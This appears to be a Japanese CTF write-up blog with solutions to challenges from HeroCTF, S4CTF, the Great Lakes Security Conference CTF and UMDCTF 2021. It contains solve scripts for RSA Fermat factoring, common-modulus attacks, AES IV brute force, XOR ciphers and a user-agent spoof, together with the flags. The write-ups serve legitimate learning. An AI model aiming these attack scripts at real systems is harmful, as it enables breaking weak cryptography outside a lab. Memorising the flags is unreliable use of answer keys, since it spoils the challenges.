f64b5fb29c37fbca0ae8191ad3707c966ddc9ec234135addadb83734dd0af5f3fb73817c1c39849485468b27faf75fa9d67983eb94ddb73378047d0efb7dc886d7b1dcb3342a83fddd6547cef6120eae8c9f8056c05b7a9e83990a53d8420a13
[SUPPORT] Password Reset
Please enter your account ID :  : Hero{_BL0CK5_}}aaaaaaaaaaaaa
f64b5fb29c37fbca0ae8191ad3707c96e67883660618a917ebb0123194a54516fb73817c1c39849485468b27faf75fa9d67983eb94ddb73378047d0efb7dc886d7b1dcb3342a83fddd6547cef6120eae8c9f8056c05b7a9e83990a53d8420a13
[SUPPORT] Password Reset
Please enter your account ID :  : Hero{_BL0CK5_}~aaaaaaaaaaaaa
f64b5fb29c37fbca0ae8191ad3707c966dfb07b93ef34200197273193a9f605efb73817c1c39849485468b27faf75fa9d67983eb94ddb73378047d0efb7dc886d7b1dcb3342a83fddd6547cef6120eae8c9f8056c05b7a9e83990a53d8420a13
Hero{_BL0CK5_}
Hero{_BL0CK5_}

Yours_truely (Crypto 150)

RSA暗号を復号する必要があるが、pとqは比較的近いので、Fermat法で素因数分解し、復号する。復号できたら、フラグのAES暗号結果が表示される。keyの生成方法に脆弱性があり、生成元のkeyが何であっても、AESの鍵は決まったものになる。ivはUNIXTIMEにより生成されるものなので、その時間の付近でブルートフォースすれば、どれかで復号できる。このことを元に復号する。

#!/usr/bin/python3
import socket
from Crypto.Util.number import *
from Crypto.Util.Padding import pad, unpad
from Crypto.Cipher import AES
import hashlib
import base64
import time

def recvuntil(s, tail):
    data = b''
    while True:
        if tail in data:
            return data.decode()
        data += s.recv(1)

def isqrt(n):
    x = n
    y = (x + n // x) // 2
    while y < x:
        x = y
        y = (x + n // x) // 2
    return x

def fermat(n):
    x = isqrt(n) + 1
    y = isqrt(x * x - n)
    while True:
        w = x * x - n - y * y
        if w == 0:
            break
        elif w > 0:
            y += 1
        else:
            x += 1
    return x - y, x + y

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('chall3.heroctf.fr', 9000))

data = recvuntil(s, b'>> ')
print(data, end=''),

n = int(data.split('\n')[6].split(': ')[1])
e = int(data.split('\n')[7].split(': ')[1])

m = b'the_proof_of_your_love'
h = bytes_to_long(hashlib.sha512(m).digest())

p, q = fermat(n)

phi = (p - 1) * (q - 1)
d = inverse(e, phi)
inp = pow(h, d, n)
print(str(inp))
s.sendall(str(inp).encode() + b'\n')

data = recvuntil(s, b'1926\n').rstrip()
print(data)

now = int(time.time())

ct = eval(data.split('\n')[-1].split(' ')[-2][:-1])
ct = base64.b64decode(ct)

key = hashlib.sha256().update(b'abcd')
key = pad(str(key).encode(), AES.block_size)

init = now - 15
for t in range(init, init + 30):
    iv  = pad(long_to_bytes(t), AES.block_size)
    cipher = AES.new(key, AES.MODE_CBC, iv)
    flag = cipher.decrypt(ct)
    if flag.startswith(b'Hero'):
        print(unpad(flag, AES.block_size))
        break

実行結果は以下の通り。

        Bob my darling is that you ? It's me, Alice !
        To prove you're the one I'm talking to, send me "the_proof_of_your_love".
        Beware, I'll only accept it if it's signed with the (private) key to my heart.
        I know that your love for me is strong enough to factor a 4096bit modulus <3

        public modulus  : 19145973648550935377079611697722671322274118139557042301776642572115274475226281351296738182875290635134813224293883389973049443515269908518704219503952148890097645403491837207177190945431275778576662907734022538613194063606420988350896073217836210777938665578959922821856160472790904337031563650016236178845172255740853588997129614508991748558846565741707595652297076869963768864488229430906362050625238195547618355568022771784515556690384017231801498369585758994892245595251043842090400753728275751497303055355451492048644058953018203147447698953709612746227358321608078111637339941239914029593642702957555080184951
        public exponent : 65537


input >> 16423975165539199710954883838287766637740299595805685657329381711287013713584703485103471670065680045100349517078754281102287050596416275890816715821631750657816282417946253962726927228771205924986723313891882999998030755005321072718264067166511599175471175120380275267114127482251454766907610039672654009713311033905576115240200422450040571457188945059423174693677307893719678698870580379961046268598323124759562856222591353826891403040275219870408720856318265840717591291941558341019396883074756973407710737499131274393030162919093284878894704087214589617733983666288005006041167204167328989997550257721388176549667

        La courbe eliptique de tes yeux fait le tour de mon kernel,
        Un math.rand de danse et de douceur,
        Auréole du temps, anneau nocturne et sûr,
        Et si je ne sais plus tout ce que j’ai vécu
        C’est que tes yeux ne m’ont pas toujours vu.

        - b'Vp13cMqrOGsMXQCycegGfHynrP38+L3ZO/V2kuK4GVo=', 1926
b'Hero{P4ul_Eluh4ck}'
Hero{P4ul_Eluh4ck}

S4CTF 2021 Writeup

この大会は2021/4/23 2:30(JST)~2021/4/25 2:30(JST)に開催されました。
今回もチームで参戦。結果は151点で312チーム中88位でした。
自分で解けた問題をWriteupとして書いておきます。

S4CTF{Are_You_Alive!} (BONUS)

問題タイトルがフラグになっている。

S4CTF{Are_You_Alive!}

Baby-XoR (CRYPTO (JUNIOR))

この暗号では、flagの各文字を次の文字とXORしていく。最後の文字は先頭の文字とXORしている。先頭の文字のブルートフォースにより、復号する。

with open('flag.enc', 'rb') as f:
    enc = f.read()

for code in range(32, 127):
    flag = chr(code)
    for i in range(len(enc) - 1):
        flag += chr(ord(enc[i]) ^ ord(flag[i]))
    if 'S4CTF{' in flag:
        print flag
        break

復号結果は以下の通り。

the flag is: S4CTF{XOR_x0r_XoR_X0r_xOr!!!}
S4CTF{XOR_x0r_XoR_X0r_xOr!!!}

Great Lakes Security Conference CTF Writeup

この大会は2021/4/17 7:00(JST)~2021/4/20 7:00(JST)に開催されました。
今回もチームで参戦。結果は1000点で56チーム中28位でした。
自分で解けた問題をWriteupとして書いておきます。

PYC's? (Reverse Engineering)

pycが添付されているが、フォーマットが違う。添付されているpycをPython 2.7のpycのヘッダと比較し、分析してみる。

正しいPython 2.7のpyc
03 f3 0d 0a

E_NCSA.pyc
79 8a 87 8d

>>> '%x' % (0x03 ^ 0x79)
'7a'
>>> '%x' % (0xf3 ^ 0x8a)
'79'
>>> '%x' % (0x0d ^ 0x87)
'8a'
>>> '%x' % (0x0a ^ 0x8d)
'87'

暗号の前のバイトが復号のXORの鍵になっている。このことを元にpycを復号する。

with open('E_NCSA.pyc', 'rb') as f:
    enc = f.read()

key = 0x7a

dec = ''
for c in enc:
    dec += chr(ord(c) ^ key)
    key = ord(c)

with open('E_NCSA_fix.pyc', 'wb') as f:
    f.write(dec)

復号したpycをデコンパイルする。

$ uncompyle6 E_NCSA_fix.pyc 
# uncompyle6 version 3.7.4
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.6.9 (default, Jan 26 2021, 15:33:00) 
# [GCC 8.4.0]
# Embedded file name: NCSA.py
# Compiled at: 2021-02-24 10:40:50
import requests, hashlib, os, struct
from Crypto.Cipher import AES
k = hashlib.sha256(requests.get('http://www.script-o-rama.com/movie_scripts/t/300-script-transcript-sparta.html').text.encode()).hexdigest()[0:32].encode()
iv = hashlib.md5(requests.get('https://subslikescript.com/movie/300_Rise_of_an_Empire-1253863').text.encode()).hexdigest()[0:16].encode()
in_filename = 'flag.zip'
out_filename = 'flag.enc'
chunksize = 65536
encryptor = AES.new(k, AES.MODE_CBC, iv)
filesize = os.path.getsize(in_filename)
c = ''
with open(in_filename, 'rb') as (infile):
    with open(out_filename, 'wb') as (outfile):
        outfile.write(struct.pack('<Q', filesize))
        outfile.write(iv)
        while True:
            chunk = infile.read(chunksize)
            if len(chunk) == 0:
                break
            else:
                if len(chunk) % 16 != 0:
                    chunk += str(' ' * (16 - len(chunk) % 16)).encode()
                out = ''
                for i in range(len(chunk)):
                    c += bytes.fromhex(("b'{:02x}'").format(chunk[i] ^ 19)[2:4][1] + '' + ("b'{:02x}'").format(chunk[i] ^ 19)[2:4][0])

                for i in range(len(c) - 1, -1, -1):
                    out += bytes.fromhex(("b'{:02x}'").format(c[i])[2:4])

            outfile.write(encryptor.encrypt(out))
# okay decompiling E_NCSA_fix.pyc

この暗号の処理は以下の通り。

・k: スクリプトで指定しているURLのページ本体のsha256の16進数の前半32バイト
・iv: スクリプトで指定しているURLのページ本体のmd5の16進数の前半16バイト
・ファイルサイズをリトルエンディアンで8バイト書込み
・ivを書き込み
・入力データ65536バイトごとに以下実行
 ・データサイズが16の倍数でない場合はスペースをパディング
 ・c: 各バイトごとに16進数で19とXORしたものの1バイト目と2バイト目を入れ替える。
 ・バイナリ全体の順序を逆にする。
 ・AES-CBCの暗号化をしてファイルに出力する。

このことから逆算して、復号する。

import requests, hashlib, struct
from Crypto.Cipher import AES

with open('flag.enc', 'rb') as f:
    enc = f.read()

k = hashlib.sha256(requests.get('http://www.script-o-rama.com/movie_scripts/t/300-script-transcript-sparta.html').text.encode()).hexdigest()[0:32].encode()
iv = hashlib.md5(requests.get('https://subslikescript.com/movie/300_Rise_of_an_Empire-1253863').text.encode()).hexdigest()[0:16].encode()

filesize = struct.unpack('<Q', enc[:8])[0]
assert iv == enc[8:24]

encryptor = AES.new(k, AES.MODE_CBC, iv)
out = encryptor.decrypt(enc[24:])
c = out[::-1]
chunk = ''
for i in range(len(c)):
    byte = c[i].encode('hex')
    chunk += chr(int(byte[1] + byte[0], 16) ^ 19)

chunk = chunk.rstrip(' ')

with open('flag.zip', 'wb') as f:
    f.write(chunk)

復号したflag.zipを解凍すると、flag.txtが展開され、フラグが書いてあった。

GLSC{S3m1_Cus70m_3ncryptions}

RansomWary (Crypto)

AES-ECBの暗号なので、16バイト単位で暗号化される。bmpのヘッダだけ正しいものにすれば、なんとなくの画像は復元できるはず。header部分のみ差し替えて、画像にする。

with open('forensics.out', 'r') as f:
    lines = f.read().split('\n')

with open('flag.bmp', 'rb') as f:
    data = f.read()

flag = ''
for line in lines:
    codes = line.split(' ')[1:17]
    for c in codes:
        flag += chr(int(c, 16))

flag += data[len(flag):]

with open('flag_mod.bmp', 'wb') as f:
    f.write(flag)

f:id:satou-y:20210428071859j:plain

GLSC{3cb_1sn7_53cur3}

UMDCTF 2021 Writeup

この大会は2021/4/17 6:00(JST)~2021/4/19 6:00(JST)に開催されました。
今回もチームで参戦。結果は17174点で484チーム中10位でした。
自分で解けた問題をWriteupとして書いておきます。

Hello World (Init)

問題にフラグが書いてあった。

UMDCTF-{h3ll0_w0rld}

Resume (Init)

適当な履歴書を作って、送信すると、フラグが表示された。

UMDCTF-{th@nk_y0uuuu}

Discord (Init)

Discordに入り、#welcomeチャネルのメッセージを見ると、フラグが書いてあった。

UMDCTF-{w3lc0m3_t0_d1sc0rd}

Bomb1 - Quiz Time (Misc)

jarファイルが添付されているので、JD-GUIデコンパイルする。Bomb1クラスのbombOne()メソッドのflag変数にフラグが設定されていることがわかる。

UMDCTF-{c00l_math_f0r_c0llege_kidZ}

Starbucks (Reverse Engineering)

classファイルが添付されているので、JD-GUIデコンパイルする。

import java.io.PrintStream;

public class Challenge
{
  public static String f1(String s)
  {
    StringBuilder b = new StringBuilder();
    char[] arr = s.toCharArray();
    for (int i = 0; i < arr.length; ++i) {
      b.append((char)(arr[i] + i));
    }

    return b.toString();
  }

  public static String f1_rev(String s) {
    StringBuilder b = new StringBuilder();
    char[] arr = s.toCharArray();
    for (int i = 0; i < arr.length; ++i) {
      b.append((char)(arr[i] - i));
    }

    return b.toString();
  }

  public static String f2(String s) {
    int half = s.length() / 2;
    return s.substring(half + 1) + s.substring(0, half + 1);
  }

  public static String f3() {
    return f1(f2("$aQ\"cNP `_\29[eULB@PA'thpj]"));
  }

  public static void main(String[] args) {
    System.out.println("You really thought finding the flag would be so easy?");
  }
}

f3()の結果を出力する。

def f1(s):
    d = ''
    for i in range(len(s)):
        d += chr(ord(s[i]) + i)
    return d

def f2(s):
    half = len(s) / 2
    return s[half+1:] + s[:half+1]

flag = f1(f2("$aQ\"cNP `_\x1d[eULB@PA'thpj]"))
print flag
UMDCTF-{pyth0n_1s_b3tt3r}

The Matrix (Web)

$ curl http://chals5.umdctf.io:4000

<!doctype html>

<html lang="en">

<head>
    
    <link rel= "stylesheet" type= "text/css" href= "/static/main.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script>
    
    <meta charset="utf-8">
    <title>Enter the Matrix</title>
</head>
<body>
    <h1>The Matrix</h1>

    <nav id="nav" class="navbar navbar-expand-lg navbar-light bg-light">
  <a class="navbar-brand" href="#">Navbar</a>
  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
  <div class="collapse navbar-collapse" id="navbarNav">
    <ul class="navbar-nav">
      <li class="nav-item active">
        <a class="nav-link" href="/">Home</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="/the-matrix">The Matrix</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="/about">About</a>
      </li>
    </ul>
  </div>
</nav>
</body>

<div class='centered-wrapper'>
    <a href="/the-matrix" class='button centered'>Enter the matrix!</a>
</div>

$ curl http://chals5.umdctf.io:4000/the-matrix
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/403">/403</a>.  If not click the link.

$ curl http://chals5.umdctf.io:4000/the-matrix -L
<h2>This page is for robots only, you are not allowed to access this content!</h2>

GooglebotのUserAgentを指定してアクセスしてみる。

$ curl http://chals5.umdctf.io:4000/the-matrix -A "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

<!doctype html>

<html lang="en">

<head>
    
    <link rel= "stylesheet" type= "text/css" href= "/static/main.css">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-giJF6kkoqNQ00vy+HMDP7azOuL0xtbfIcaT9wjKHr8RbDVddVHyTfAAsrekwKmP1" crossorigin="anonymous">
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-ygbV9kiqUc6oa4msXn9868pTtWMgiQaeYH7/t7LECLbyPA2x65Kgf80OJFdroafW" crossorigin="anonymous"></script>
    
    <meta charset="utf-8">
    <title>Enter the Matrix</title>
</head>
<body>
    <h1>The Matrix</h1>

    <nav id="nav" class="navbar navbar-expand-lg navbar-light bg-light">
  <a class="navbar-brand" href="#">Navbar</a>
  <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
  <div class="collapse navbar-collapse" id="navbarNav">
    <ul class="navbar-nav">
      <li class="nav-item active">
        <a class="nav-link" href="/">Home</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="/the-matrix">The Matrix</a>
      </li>
      <li class="nav-item">
        <a class="nav-link" href="/about">About</a>
      </li>
    </ul>
  </div>
</nav>
</body>

<h2>Greetings Fellow Robot Overlord</h2>
<p>UMDCTF-{r0b0t_r3b3ll!0n}</p>
UMDCTF-{r0b0t_r3b3ll!0n}

Not Slick (Forensics)

PNGファイルのバイナリデータがバイト単位で逆になっているので戻す。

with open('notslick.png', 'rb') as f:
    data = f.read()

with open('flag.png', 'wb') as f:
    f.write(data[::-1])

f:id:satou-y:20210427074340p:plain

UMDCTF-{abs01ute1y_r3v3r53d}

Protocol One and Zero (Forensics)

ICMPのパケットが大量にある。RAWデータの後半が\x00のパターンと\xffのパターンがあるので、0, 1と判定し、2進数としてデコードする。

from scapy.all import *

packets = rdpcap('protocol_one_and_zero.pcapng')

b_flag = ''
for p in packets:
    if p[ICMP].type == 0:
        if p[Raw].load[-1] == '\x00':
            b_flag += '0'
        else:
            b_flag += '1'

flag = ''
for i in range(0, len(b_flag), 8):
    flag += chr(int(b_flag[i:i+8], 2))
print flag
UMDCTF-{b1n_p1Ng_P0ng}

Testudo's Pizza (Steganography)

$ strings hiddenmsg.jpg | grep UMDCTF
\f0\fs24 \cf0 \'93UMDCTF-{W3_ar3_th3_b3st_P1ZZ3r1a}\'94}
UMDCTF-{W3_ar3_th3_b3st_P1ZZ3r1a}

Art Class (Crypto)

国際信号旗の暗号。https://ja.wikipedia.org/wiki/国際信号旗を参考に復号する。

UMDCTF-{F1AG_0F_7LA9S}

Celebration (Crypto)

踊る人形の暗号。https://www.dcode.fr/dancing-men-cipherで復号する。

UMDCTF-{yo_ITS_A_PARTYYY}

Office Secrets (Crypto)

同じnで異なるeでRSAの暗号化をしているものが2つあるので、Common Modules Attackで復号する。

import gmpy2
from Crypto.Util.number import *

def commom_modules_attack(c1, c2, e1, e2, n):
    gcd, s1, s2 = gmpy2.gcdext(e1, e2)
    if s1 < 0:
        s1 = -s1
        c1 = inverse(c1, n)
    elif s2 < 0:
        s2 = -s2
        c2 = inverse(c2, n)
 
    v = pow(c1, s1, n)
    w = pow(c2, s2, n)
    x = (v*w) % n
    return x

with open('details.txt', 'r') as f:
    data = f.read().split('\n')

n = int(data[0].split(' ')[-1])
e1 = int(data[1].split(' ')[-1])
e2 = int(data[2].split(' ')[-1])
c1 = int(data[3].split(' ')[-1])
c2 = int(data[4].split(' ')[-1])

m = commom_modules_attack(c1, c2, e1, e2, n)
flag = long_to_bytes(m)
print flag
UMDCTF-{Sh4r1ng_I5_d3f1n1t3ly_n0t_c4r!ng}

To Be Xor Not To Be (Crypto)

ciphertext.txtは2進数で書かれているので、デコードした後keyとXORをして復号する。試した見たところkeyのサイズ分だけ暗号の末尾だけ復号すればよいことがわかり、復号できた。最終的なコードは以下の通り。

from Crypto.Util.number import *

with open('ciphertext.txt', 'r') as f:
    enc = f.read().rstrip()

enc = long_to_bytes(int(enc, 2))

with open('key.txt', 'r') as f:
    key = f.read().rstrip()

len_pt = len(enc) - len(key)

flag = enc[:len_pt]
for i in range(len(key)):
    flag += chr(ord(enc[i+len_pt]) ^ ord(key[i]))
print flag
UMDCTF-{w3lc0m3_t0_crypt0}

Computer Troubles (Crypto)

base85文字列と推測し、デコードすると、hexエンコードされた文字列になった。以降、hexデコード、base64デコード、hexデコードを行うとフラグになる。

#!/use/bin/python3
import base64
import binascii

enc = "1hAO$2)R0D2.8<u2)-m@1hAL#1h8Bs1hAL#2)-mB1h8LT2)-mC2*!R'2D[-D1hAUS1bgdA1hAL#2*!TT1hAUS2).$u1h8OR2)[@'1hARR2I\Hu1h8OR2)[@'1hAUS1c[L'1h8OR2*!TT1hARR2)-mC1hJU%2Dd=$"
msg = base64.a85decode(enc)
print('[+] base85 decode:', msg)
msg = binascii.unhexlify(msg)
print('[+] hex decode:', msg)
msg = base64.b64decode(msg)
print('[+] base64 decode:', msg)
msg = binascii.unhexlify(msg)
print('[+] hex decode:', msg)

実行結果は以下の通り。

[+] base85 decode: b'4e5455305a4451304e444d314e4451324d6d5133596a63314e7a41324e4459784e7a517a4d7a566d4e6a6b334d7a566d4e7a497a4d7a59784e6a51334f54646b'
[+] hex decode: b'NTU0ZDQ0NDM1NDQ2MmQ3Yjc1NzA2NDYxNzQzMzVmNjk3MzVmNzIzMzYxNjQ3OTdk'
[+] base64 decode: b'554d444354462d7b7570646174335f69735f72336164797d'
[+] hex decode: b'UMDCTF-{updat3_is_r3ady}'
UMDCTF-{updat3_is_r3ady}

Card Obsession? (Crypto)

DTMFらしき音がが入っている。wavに変換してhttp://dialabc.com/sound/detect/でtoneを出力する。

886322283334443666685554445533222277737777
||>
ガラケーのキーパッドの入力になっているので、意味が通るように適宜連続する数字を切って文字にする。
>||
8863222833344436666685554445533222277737777
U MDC  TF  I  DO  N TL  I  K E C  AR  DS
UMDCTF-{I_DONT_LIKE_CARDS}

Cards Galore (Crypto)

トランプが並んでいるが、フラグの形式から考えると、各カードが1対1でアルファベットと対応していると推測できる。アルファベットは26文字、トランプは1つのマークにつき13枚。色で分けて対応付けをすることを考える。

黒08 赤09 赤02 黒02 赤12 黒07
赤07 黒03 黒06
黒07 黒03 黒06 黒08 赤10 黒02 赤08
黒01 黒13
赤04 赤02 黒06 赤05 黒07

以下の法則でアルファベットにする。

ABCDEFGHIJKLM 黒(クラブ、スペード)
NOPQRSTUVWXYZ 赤(ハート、ダイヤ)
         1111
1234567890123

アルファベットにした結果は以下の通り。

HVOBYG
TCF
GCFHWBU
AM
QOFRG

https://www.geocachingtoolbox.com/index.php?lang=en&page=caesarCipherで復号する。

Rotation 14:
THANKS
FOR
SORTING
MY
CARDS
UMDCTF-{THANKS_FOR_SORTING_MY_CARDS}

Subway (Crypto)

アルファベットはa~j以外はシフト3、さらにシフト後a~jは0~9に、数字は以下の対応で復号する。

0123456789
ABCDEFGHIJ
import string

ct = 'W74 5o06 8v XP32W5-{qdw_0_vepsog_vx1vwewxwedq_w7ev_wepg}'

pt = ''
for c in ct:
    if c in string.lowercase:
        index = string.lowercase.index(c) - 3
        if index < 0:
            index += 26
        if index < 10:
            pt += str(index)
        else:
            pt += string.lowercase[index]
    elif c in string.uppercase:
        index = string.uppercase.index(c) - 3
        if index < 0:
            index += 26
        if index < 10:
            pt += str(index)
        else:
            pt += string.uppercase[index]
    elif c in string.digits:
        pt += string.uppercase[int(c)]
    else:
        pt += c

print pt
THE FlAG Is UMDCTF-{n0t_A_s1mpl3_suBst1tut10n_tH1s_t1m3}

このままフラグを投入したが、ダメだったので、"{ }"の中を小文字にしたら通った。

UMDCTF-{n0t_a_s1mpl3_subst1tut10n_th1s_t1m3}